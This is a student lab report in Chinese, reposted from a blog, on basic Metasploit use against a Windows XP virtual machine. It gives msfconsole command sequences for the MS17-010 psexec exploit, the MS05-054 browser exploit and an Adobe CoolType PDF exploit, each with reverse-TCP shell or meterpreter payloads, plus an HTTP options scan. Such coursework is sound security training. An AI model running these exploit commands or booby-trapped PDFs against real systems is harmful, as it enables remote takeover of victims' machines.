Exp5 MSF基础应用 20164323段钊阳
网络对抗技术 20164323 Exp5 MSF基础应用
靶机 ip:192.168.1.229 kali ip:192.168.1.216
exploit选取
主动攻击:ms17_010_psexec(唯一)
浏览器攻击:ms05_054_onload(成功)
客户端攻击:adobe_cooltype_sing(唯一)
辅助模块:scanner/http/options(唯一)
问题思考
exploit: exploit在我看来就是利用模块进行攻击的意思吧,可能是对的吧
payload:用来攻击的代码、程序等
encode:应该是对payload进行编码从而实验免杀吧。
实验内容
任务一:ms17_010_psexec主动攻击实践(靶机:winxp)
首先进入msf的模块目录下查看可用的exploit
在msfconsole控制台使用该模块并查看适用的靶机系统版本以及需要设置的参数项等相关信息
按照参数配置后,开始攻击
use exploit/windows/smb/ ms17_010_psexec //使用该模块 show payloads //查看载荷set payload generic/shell_reverse_tcp //使用tcp反弹连接set LHOST 192.168.1.216 //设置攻击机的IP,即KALI的IP地址set LPORT 4323 //设置攻击端口set RHOST 192.168.1.229 //设置靶机IPset target 0 //选择自动目标系统类型 exploit
任务二:ms05_054_onload针对浏览器攻击(靶机:winxp)
配置exploit
set payload windows/meterpreter/reverse_tcp //使用TCP回连set LHOST 192.168.1.216 //攻击机ipset LPORT 4323 //攻击端口set URIPATH 4323dzyexploit //攻击 生成http://192.168.1.216:8080/4323dzy
靶机访问前CPU占用率正常
靶机访问后cpu立马飙升,同时kali上出现了访问的信息
任务三:adobe_cooltype_sing针对客户端攻击(靶机:Win XP SP3 + adobe reader 9.0)
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp` //tcp反向回连set LHOST 192.168.1.216//攻击机ipset LPORT 4323 //攻击端口set FILENAME 20164323.pdf //设置生成pdf文件的名字 exploit //攻击
成功生成20164323.pdf。
将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
use windows/fileformat/adobe_cooltype_sing set payload windows/meterpreter/reverse_tcp` //tcp反向回连set LHOST 192.168.1.216//攻击机ipset LPORT 4323 //攻击端口set FILENAME 20164323.pdf //设置生成pdf文件的名字 exploit //攻击
然后在靶机上打开20164323.pdf文件。
kali连接成功。
任务四:scanner/http/optionsr (靶机winxp)
使用命令msf > show auxiliary查看所有的辅助模块
scanner/http/options
显示每个系统的可用HTTP选项
我们可以看到它的描述:
use scanner/http/optionsset RHOSTS 192.168.1.229set RPORT 80exploit
在端口80监听时我们可以看到返回信息
可以允许的Http选项,虽然我不知道什么意思吧
实验中遇到的问题及解决方法:实验遇到的问题就是好多模块没法使用,还有winxp的虚拟机联网问题,我弄了好久,最后联通了。还有许多模块的options不知道什么意思,怎么设置。
实验感想:这次实验我们用的都是一些很过时的攻击模块,但是还是又很多的都失败了,说明计算机的技术在进步,还说明我们其实真的很菜,需要多学习有关方面的知识!
转载于:https://www.cnblogs.com/dzy9/p/10726200.html
Exp5 MSF基础应用 20164323段钊阳相关推荐
- Exp9 Web安全基础实践 20164323段钊阳
网络对抗技术 20164323 Exp9 Web安全基础实践 回答问题 (1)SQL注入攻击原理,如何防御 原理:通过在用户名.密码登输入框中输入特殊字符,在处理字符串与sql语句拼接过程中实现引号闭 ...
- Exp8 web基础 20164323段钊阳
网络对抗技术 20164323 Exp8 Web基础 回答问题 (1)什么是表单 在网页中主要负责数据采集功能.一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以 ...
- Exp3 免杀原理与实践 20164323段钊阳
网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...
- Exp2 后门原理与实践 20164323段钊阳
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...
- Exp4 恶意代码分析 20164323段钊阳
网络对抗技术 20164323 Exp4 恶意代码分析 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操作有哪些,用什么方法来监控. ...
- Exp7 网络欺诈防范 20164323段钊阳
<网络对抗技术>Exp7: 网络欺诈防范 1 基础问题回答和实验内容 1.1基础问题回答 (1)通常在什么场景下容易受到DNS spoof攻击. 连在相同网段内. 连接公共wifi (2) ...
- Exp6 信息搜集与漏洞扫描 20164323段钊阳
20164323 Exp6 信息搜集与漏洞扫描 回答问题 1.哪些组织负责DNS,IP的管理. 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理.全球一共 ...
- 20155216 Exp5 MSF基础应用
Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就是利用,在做攻击时,通常称为漏洞利用. 一 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
最新文章
- 用Asp.net实现简单的文字水印
- batch normalization的原理和作用_springboot自动配置原理
- java 鉴权_我爱java系列之---【JWT实现微服务鉴权(一)】
- [渝粤教育] 天津现代职业技术学院 餐饮服务实务(翁莉) 参考 资料
- Office - 安装程序找不到office.zh-cn\*.文件
- MySQL启动关闭服务巨慢,这样解决!
- Android四大组件---BroadcastReceiver
- 将您的SQL Server工作负载迁移到PostgreSQL –第1部分
- abstract 抽象类
- 【图像隐写】基于matlab GBT+SVD数字水印嵌入与提取【含Matlab源码 1668期】
- linux系统的初化始配置(临时生效和永久生效)
- 航空公司客户价值特征构建与分析k-means
- 七缸发动机预热,docker swarm + .net core 高速飙车成功
- 这几天加班熬夜把所有Python库整理了一遍,非常全面!
- excel批量重命名工作表
- 开源物联网终端设备操作系统
- 网络爬虫与机器学习算法在城市分析中的应用(python)
- c++中引用变量的使用
- 小虫记之iptables
- 嘉宾专访|2020 PostgreSQL亚洲大会中文分论坛:韩国盛